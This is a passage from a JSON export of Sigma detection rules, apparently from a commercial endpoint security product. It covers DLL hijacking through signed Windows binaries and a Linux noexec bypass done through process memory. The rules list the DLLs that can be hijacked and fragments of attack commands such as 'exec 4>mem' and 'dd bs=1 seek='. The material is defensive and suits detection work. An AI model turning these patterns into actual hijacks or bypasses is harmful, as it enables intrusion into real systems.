"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with online repositories containing attack code to perform memory-only attacks.\nAttackers can use off-the-shelf malicious PowerShell scripts to perform various actions on infected hosts, such as discovery, establishing persistence, or exploiting vulnerabilities.\nIt is recommended to investigate the detected PowerShell script to look for malicious content, as well as other actions taken by the PowerShell process and its ancestors.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1125",
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f1306b77-a489-459c-9b75-ef762e3417b8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598687Z",
"creation_date": "2026-03-23T11:45:34.598690Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598698Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bitsadmin.yml",
"content": "title: DLL Hijacking via bitsadmin.exe\nid: f1306b77-a489-459c-9b75-ef762e3417b8\ndescription: |\n Detects potential Windows DLL Hijacking via bitsadmin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bitsadmin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f1306b77-a489-459c-9b75-ef762e3417b8",
"rule_name": "DLL Hijacking via bitsadmin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bitsadmin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f15da969-0fe2-4ed7-ac79-667f3384fed2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096152Z",
"creation_date": "2026-03-23T11:45:34.096154Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096158Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dccw.yml",
"content": "title: DLL Hijacking via dccw.exe\nid: f15da969-0fe2-4ed7-ac79-667f3384fed2\ndescription: |\n Detects potential Windows DLL Hijacking via dccw.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dccw.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ColorAdapterClient.dll'\n - '\\dxva2.dll'\n - '\\mscms.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f15da969-0fe2-4ed7-ac79-667f3384fed2",
"rule_name": "DLL Hijacking via dccw.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dccw.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f164f721-c2c7-4255-8c70-bd893ae67964",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094117Z",
"creation_date": "2026-03-23T11:45:34.094119Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094123Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_secedit.yml",
"content": "title: DLL Hijacking via secedit.exe\nid: f164f721-c2c7-4255-8c70-bd893ae67964\ndescription: |\n Detects potential Windows DLL Hijacking via secedit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'secedit.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\SCECLI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f164f721-c2c7-4255-8c70-bd893ae67964",
"rule_name": "DLL Hijacking via secedit.exe",
"rule_description": "Detects potential Windows DLL Hijacking via secedit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f1797d56-b576-44bf-a391-b0cf37acb95d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296344Z",
"creation_date": "2026-03-23T11:45:35.296346Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296351Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://iq.thc.org/bypassing-noexec-and-executing-arbitrary-binaries",
"https://github.com/hackerschoice/memexec/"
],
"name": "t1055_noexec_memory_injection_bypass.yml",
"content": "title: Filesystem noexec Mount Bypass via Process Memory Manipulation\nid: f1797d56-b576-44bf-a391-b0cf37acb95d\ndescription: |\n Detects attempts to bypass noexec mount restrictions through specific process memory manipulation patterns.\n Noexec mount restrictions are security controls that prevent the execution of binary files from specific filesystems or directories. When a filesystem is mounted with the noexec flag, the operating system blocks any attempt to run executable files stored in that location, even if the files have execute permissions set.\n Adversaries may try to bypass noexec restrictions to execute malicious payloads in restricted environments.\n It is recommended to investigate the detected process as well as its execution context.\nreferences:\n - https://iq.thc.org/bypassing-noexec-and-executing-arbitrary-binaries\n - https://github.com/hackerschoice/memexec/\ndate: 2024/12/02\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.execution\n - attack.t1059.004\n - attack.t1106\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_perl:\n Image|endswith: '/perl'\n CommandLine|contains|all:\n - 'perl'\n - 'syscall'\n - '319'\n - '279'\n - '/proc/'\n - '/fd/'\n\n selection_bash:\n Image|endswith: '/bash'\n CommandLine|contains|all:\n - 'bash -c'\n - 'cd /proc/$$'\n - 'exec 4>mem'\n - 'base64 -d'\n - 'dd bs=1 seek='\n - 'cat syscall|cut -f9 -d'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f1797d56-b576-44bf-a391-b0cf37acb95d",
"rule_name": "Filesystem noexec Mount Bypass via Process Memory Manipulation",
"rule_description": "Detects attempts to bypass noexec mount restrictions through specific process memory manipulation patterns.\nNoexec mount restrictions are security controls that prevent the execution of binary files from specific filesystems or directories. When a filesystem is mounted with the noexec flag, the operating system blocks any attempt to run executable files stored in that location, even if the files have execute permissions set.\nAdversaries may try to bypass noexec restrictions to execute malicious payloads in restricted environments.\nIt is recommended to investigate the detected process as well as its execution context.\n",
"rule_creation_date": "2024-12-02",
"rule_modified_date": "2026-02-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1059.004",
"attack.t1106"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f1c03a14-5795-40c9-bf7f-a7ef5ca1e679",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096027Z",
"creation_date": "2026-03-23T11:45:34.096029Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096033Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_calc.yml",
"content": "title: DLL Hijacking via calc.exe\nid: f1c03a14-5795-40c9-bf7f-a7ef5ca1e679\ndescription: |\n Detects potential Windows DLL Hijacking via calc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'calc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\execmodelproxy.dll'\n - '\\MLANG.dll'\n - '\\PROPSYS.dll'\n - '\\Secur32.dll'\n - '\\SSPICLI.DLL'\n - '\\WININET.dll'\n - '\\twinui.appcore.dll'\n - '\\windows.storage.dll'\n # https://twitter.com/Kostastsale/status/1547738378333929473\n # https://twitter.com/executemalware/status/1547755534652022786\n - '\\WindowsCodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n 
ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f1c03a14-5795-40c9-bf7f-a7ef5ca1e679",
"rule_name": "DLL Hijacking via calc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via calc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f1f2d679-b12b-4d64-8fd7-66c5b810de17",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085825Z",
"creation_date": "2026-03-23T11:45:34.085827Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085831Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mousocoreworker.yml",
"content": "title: DLL Hijacking via mousocoreworker.exe\nid: f1f2d679-b12b-4d64-8fd7-66c5b810de17\ndescription: |\n Detects potential Windows DLL Hijacking via mousocoreworker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mousocoreworker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dmcmnutils.dll'\n - '\\dmiso8601utils.dll'\n - '\\iphlpapi.dll'\n - '\\profapi.dll'\n - '\\umpdc.dll'\n - '\\updatepolicy.dll'\n - '\\winsqlite3.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Local\\microsoft\\onedrive\\'\n - '?:\\Users\\\\*\\AppData\\Local\\microsoft\\teams\\current\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\UUS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n 
- '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\UUS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f1f2d679-b12b-4d64-8fd7-66c5b810de17",
"rule_name": "DLL Hijacking via mousocoreworker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mousocoreworker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f296e5e6-da5a-4057-bcce-17b516d2631f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098060Z",
"creation_date": "2026-03-23T11:45:34.098062Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098066Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_passwordonwakesettingflyout.yml",
"content": "title: DLL Hijacking via PasswordOnWakeSettingFlyout.exe\nid: f296e5e6-da5a-4057-bcce-17b516d2631f\ndescription: |\n Detects potential Windows DLL Hijacking via PasswordOnWakeSettingFlyout.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'PasswordOnWakeSettingFlyout.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\uxtheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f296e5e6-da5a-4057-bcce-17b516d2631f",
"rule_name": "DLL Hijacking via PasswordOnWakeSettingFlyout.exe",
"rule_description": "Detects potential Windows DLL Hijacking via PasswordOnWakeSettingFlyout.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f2d084de-19ec-4053-b8f3-b3dab54a193a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075994Z",
